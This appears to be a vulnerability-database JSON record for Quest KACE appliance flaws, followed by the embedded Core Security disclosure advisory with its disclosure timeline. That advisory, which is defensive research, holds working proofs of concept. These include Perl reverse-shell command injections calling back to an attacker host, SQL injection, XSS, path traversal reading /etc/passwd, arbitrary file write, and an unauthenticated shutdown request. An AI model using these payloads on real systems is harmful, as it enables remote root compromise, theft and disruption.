decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11141"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005459"
},
{
"db": "CNVD",
"id": "CNVD-2018-15643"
},
{
"db": "VULMON",
"id": "CVE-2018-11141"
},
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-11141",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005459",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-15643",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1213",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "148005",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2018-11141",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15643"
},
{
"db": "VULMON",
"id": "CVE-2018-11141"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005459"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11141"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1213"
}
]
},
"id": "VAR-201805-0601",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15643"
}
],
"trust": 1.1800866
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15643"
}
]
},
"last_update_date": "2023-12-18T12:01:57.795000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"title": "QuestKACESystemManagementVirtualAppliance path traversal vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/137671"
},
{
"title": "Quest KACE System Management Virtual Appliance Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81225"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15643"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005459"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1213"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005459"
},
{
"db": "NVD",
"id": "CVE-2018-11141"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11141"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/22.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/148005/quest-kace-system-management-appliance-8.0-build-8.0.318-xss-traversal-code-execution-sql-injection.html"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
},
{
"trust": 0.1,
"url": "http://[serverip]/systemui/settings_network.php"
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/reporting-security-vulnerability."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/advisory.php?id=10"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
},
{
"trust": 0.1,
"url": "https://support.quest.com/download-install-detail/6086148."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
},
{
"trust": 0.1,
"url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15643"
},
{
"db": "VULMON",
"id": "CVE-2018-11141"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005459"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11141"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1213"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-15643"
},
{
"db": "VULMON",
"id": "CVE-2018-11141"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005459"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11141"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1213"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15643"
},
{
"date": "2018-05-31T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11141"
},
{
"date": "2018-07-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005459"
},
{
"date": "2018-05-31T20:52:06",
"db": "PACKETSTORM",
"id": "148005"
},
{
"date": "2018-05-31T18:29:00.683000",
"db": "NVD",
"id": "CVE-2018-11141"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1213"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15643"
},
{
"date": "2018-06-29T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11141"
},
{
"date": "2018-07-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005459"
},
{
"date": "2018-06-29T18:52:01.480000",
"db": "NVD",
"id": "CVE-2018-11141"
},
{
"date": "2018-06-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1213"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1213"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE System Management Virtual Appliance Path Traversal Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15643"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005459"
}
],
"trust": 1.4
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1213"
}
],
"trust": 0.6
}
}
VAR-201805-0596
Vulnerability from variot - Updated: 2023-12-18 12:01The 'orgID' parameter received by the '/common/download_agent_installer.php' script in the Quest KACE System Management Appliance 8.0.318 is not sanitized, leading to SQL injection (in particular, a blind time-based type). Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Quest KACE System Management Appliance Multiple Vulnerabilities
- Advisory Information
Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release
- Vulnerability Information
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
- Vulnerability Description
From Quest KACE's website:
"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
- Vulnerable Packages
. Quest KACE System Management Appliance 8.0 (Build 8.0.318) Other products and versions might be affected too, but they were not tested.
- Vendor Information, Solutions and Workarounds
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. Patch can be download at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.9, 7.10, 7.11).
7.1. Unauthenticated command injection
[CVE-2018-11138] The '/common/download_agent_installer.php' script is accessible to anonymous users in order to download an agent for a specific platform. This behavior can be abused to execute arbitrary commands on the system.
The script receives the following parameters via the GET method:
. platform: Indicates the platform in which the agent is going to be installed . serv: SHA256 hash of a fixed value that depends of each appliance . orgid: Organization ID . version: Version number of the agent
The last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.
As stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.
Preparing payload:
/----- - platform = windows - serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c - orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'; - version = 8.0.152 (last agent version available for windows) -----/
The following proof of concept executes a reverse shell:
/----- GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1 Host: Server Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.2. Authenticated command injection
[CVE-2018-11139] The '/common/ajax_email_connection_test.php' script used to test the configured SMTP server is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input 'TEST_SERVER' sent to the script via POST method.
The following proof of concept executes a reverse shell:
/----- POST /common/ajax_email_connection_test.php HTTP/1.1 Host: [ServerIP] Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 416 Cookie: [Cookie] Connection: close
TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.3. PHP Object Injection leading to arbitrary command execution
[CVE-2018-11135] An authenticated user could abuse a deserialization call on the script '/adminui/error_details.php' to inject arbitrary PHP objects.
To exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array and meet some specific conditions in order to successfully exploit the issue.
7.4. Privilege escalation via password change in Sudo Server
[CVE-2018-11134] In order to perform actions that requires higher privileges, the application relies on a message queue managed that runs with root privileges and only allows a set of commands.
One of the available commands allows to change any user's password (including root).
Assuming we are able to run commands in the server, we could abuse this feature by changing the password of the 'kace_support' account, which comes disabled by default but has full sudo privileges.
7.5. Privilege escalation via command injection in Sudo Server
[CVE-2018-11132] As mentioned in the issue [7.4], in order to perform actions that require higher privileges, the application relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed.
A command injection vulnerability exists within this message queue which allows us to append arbitrary commands that will be run as root.
7.6. Insufficient Authorization for critical function
[CVE-2018-11142] 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts are accessible only from localhost. This restriction can be bypassed by modifying the 'Host' and 'X_Forwarded_For' HTTP headers.
The following proof of concept abuses this vulnerability to shutdown the server as an anonymous user:
/----- POST /systemui/settings_network.php HTTP/1.1 Host: localhost X-Forwarded-For: ::1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIp]/systemui/settings_network.php Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129 Content-Length: 3418 Connection: close Upgrade-Insecure-Requests: 1
-----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="CSRF_TOKEN" -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="$shutdown" DoIt! Content-Disposition: form-data; name="save" Save -----------------------------5642543667001619951434940129-- -----/
7.7. In particular, a blind time based type.
The following proof of concept induces a time delay:
/----- http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152 -----/
7.8. In particular, an error based type.
The following proof of concept retrieves the current database name:
/----- POST /common/run_report.php HTTP/1.1 Content-Length: 161 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: [ServerIP] Accept: text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8 Connection: close Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: [Cookie]
date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf -----/
/----- HTTP/1.1 200 OK Date: Thu, 08 Feb 2018 21:50:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: [ServerIP] X-KACE-Version: 8.0.318 X-KBOX-WebServer: [ServerIP] X-KBOX-Version: 8.0.318 X-KACE-WebServer: [ServerIP] X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 3548 Connection: close Content-Type: text/html; charset=utf-8
[...SNIPPED...]
<![endif]-->Report Queued: qppjqORG1qjpqq<meta http-equiv='refresh' [...SNIPPED...] -----/
7.9. Unauthenticated Cross Site Scriting in run_cross_report.php
[CVE-2018-11133] The 'fmt' parameter of the '/common/run_cross_report.php' script is vulnerable to cross-site scripting.
The following proof of concept demonstrates the vulnerability:
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
7.10. Path traversal in download_attachment.php leading to arbitrary file read
[CVE-2018-11137] The 'checksum' parameter of the '/common/download_attachment.php' script can be abused to read arbitrary files with 'www' privileges. The following proof of concept reads the '/etc/passwd' file. No administrator privileges are needed to execute this script.
It is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords.
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
The following proof of concept demonstrates the vulnerability:
/----- GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK Date: Thu, 18 Jan 2018 17:18:19 GMT Server: Apache Cache-Control: must-revalidate, post-check=0, pre-check=0 Expires: -1 Pragma: public Content-Disposition: attachment; filename="" Content-Transfer-Encoding: Binary Content-Description: K1000 attachment Content-Length: 2400 Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: k10000. X-KACE-Version: 8.0.318 X-KBOX-WebServer: k10000. X-KBOX-Version: 8.0.318 X-KACE-WebServer: k10000. X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Connection: close Content-Type: application/octet-stream
$FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
root::0:0:Charlie &:/root:/bin/csh daemon::1:1:Owner of many system processes:/root:/usr/sbin/nologin operator::2:5:System &:/:/usr/sbin/nologin bin::3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...] -----/
7.11. Path traversal in advisory.php leading to arbitrary file creation/deletion
[CVE-2018-11141] The 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the '/adminui/advisory.php' script can be abused to write and delete files respectively. The following proof of concept creates a file located at '/kbox/kboxwww/resources/TestWrite' with the content 'Sarasa' (base64 encoded). Files can be at any location where the 'www' user has write permissions.
File deletion could be abused to delete '/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's existence defines if the appliance setup wizard is shown or not.
The following proof of concept demonstrates the vulnerability:
/----- POST /adminui/advisory.php?ID=10 HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIP]/adminui/advisory.php?ID=10 Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100 Content-Length: 1705 Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
-----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN"
99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON"
{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...] -----/
Taking advantage of 7.2 and 7.4 we are able to verify the file creation:
/----- [root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite -----/
-
Report Timeline 2018-02-26: Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form. 2018-03-05: Quest Support confirmed the receipt and requested additional information. 2018-03-12: Core Security sent a draft advisory including a technical description. 2018-03-16: Quest Support asked for the CVE-IDs. 2018-03-16: Core Security answered saying that the CVE-IDs are required once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication hannel also copying the researchers behind this discovery. 2018-03-16: Quest Support thanked Core's reply and stated it will be in touch during the process. 2018-03-20: Quest Support informed that they had not yet received any updates from the engineering team and had requested one. 2018-03-21: Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information. 2018-03-21: Core replied with the affected version (that was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories. 2018-03-21: Quest Support acknowledged the information provided. 2018-03-26: Quest's KACE product manager (PM) thanked Core for making it aware of the security issues found and the level of thoroughness and details provided. Quest specified it had fixes already in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM notified the work done by Core is in breach of its license agreement, and requested Core not to distribute the findings to the public, otherwise uest would take legal action. 2018-04-13: Quest's KACE PM sent a follow up email and informed that it made a hotfix to patch the reported vulnerabilities. Quest also requested a call meeting to understand future opportunities based on the Core's company capabilities. Finally, Quest asked for information about the researcher that found the vulnerabilities and a link of Core's choosing in order to be included in Quest's Acknowledgment page (https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 2018-04-16: Core answered email from 2018-03-26 stating the company is following standard practices with regards to coordinated vulnerability disclosure, and also sent detailed technical information about our findings at Quest's request. Core also mentioned Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that they encourage on their website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry standard disclosure processes that involves publication of the vulnerabilities. 2018-04-17: Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13). 2018-04-17: Core thanked the answer and stated the willingness of keeping written communications between parties in order to better document the process and communicated the next steps of the process including: 1. Testing the fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor's link to be included in the advisory and finally 4. Send final advisory version to vendor and coordinate publication date together. With regards to Quest's requests, Core provided the researchers names and URL of the advisory when it will be published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked the right contact at Quest) but our intention is to keep that services request separate from the coordinated disclosure process. 2018-04-18: Quest Support informed that they had publicly made available patches for its customers and unilaterally closed the case. 2018-05-31: Advisory CORE-2018-0004 published.
-
References
[1] https://www.quest.com/products/kace-systems-management-appliance/
- About CoreLabs
